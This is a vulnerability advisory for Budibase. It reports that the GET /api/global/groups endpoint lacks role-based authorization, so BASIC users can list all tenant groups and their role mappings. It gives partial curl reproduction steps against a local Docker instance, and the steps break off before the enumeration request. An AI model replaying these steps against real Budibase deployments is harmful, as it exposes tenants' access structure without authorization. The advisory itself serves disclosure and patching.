mediumCVSS 4.3Vulnerability

GHSA-4qcj-m5wp-jmf4

## Summary The `GET /api/global/groups` endpoint on the worker service has no role-based authorization middleware. Any authenticated user (including BASIC role) can enumerate all user groups in the tenant, including their role mappings, user memberships, builder permissions, and the isDefault flag. ## Steps to Reproduce ### 1. Start Budibase ```bash docker run -d --name budibase-poc -p 10000:80 \ -e MINIO_ACCESS_KEY=minio_access -e MINIO_SECRET_KEY=minio_secret \ -e INTERNAL_API_KEY=internal_api_key -e JWT_SECRET=jwt_secret_test \ -e API_ENCRYPTION_KEY=api_enc_key_test123456 \ -e [email protected] \ -e BB_ADMIN_USER_PASSWORD=TestPassword123! \ budibase/budibase:latest until curl -sf http://localhost:10000/health; do sleep 5; done ``` ### 2. Login as admin, create a user group, create a BASIC user ```bash # Login as admin curl -s -c /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json" \ -d '{"username":"[email protected]","password":"TestPassword123!"}' # Create a user group (requires license with user groups feature, or use Budibase Cloud) # On self-hosted without license, groups may not be available # If available: curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/groups \ -H "Content-Type: application/json" \ -d '{"name":"Secret Admin Group","color":"#ff0000","icon":"AdminPanelSettingsIcon","roles":{"app_abc123":"ADMIN"}}' # Create a BASIC user (no builder, no admin) curl -s -b /tmp/bb_admin.txt -X POST http://localhost:10000/api/global/users \ -H "Content-Type: application/json" \ -d '{"email":"[email protected]","password":"BasicPass123!","roles":{},"admin":{"global":false},"builder":{"global":false}}' ``` ### 3. Login as BASIC user and enumerate all groups (the vulnerability) ```bash # Login as BASIC user curl -s -c /tmp/bb_basic.txt -X POST http://localhost:10000/api/global/auth/default/login \ -H "Content-Type: application/json"

Properties

ghsa_id
GHSA-4qcj-m5wp-jmf4
severity
medium
summary
Budibase: Missing RBAC on GET /api/global/groups allows BASIC users to enumerate all tenant groups and role mappings
cvss_score
4.3
cve_id
GHSA-4qcj-m5wp-jmf4
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
is_ghsa_only
true
ghsa_published
2026-07-24T21:13:07Z
source_url
https://github.com/advisories/GHSA-4qcj-m5wp-jmf4
ghsa_updated
2026-07-24T21:13:08Z

Related Entities (4)

REPORTED_BY (1)

[Source]GitHub Advisory Database

VULNERABLE_TO (1)

[Software]npm/@budibase/server

AFFECTS (1)

[Software]npm/@budibase/server

HAS_WEAKNESS (1)

[Weakness]Missing Authorization

Explore deeper with Ninja Signal's threat intelligence graph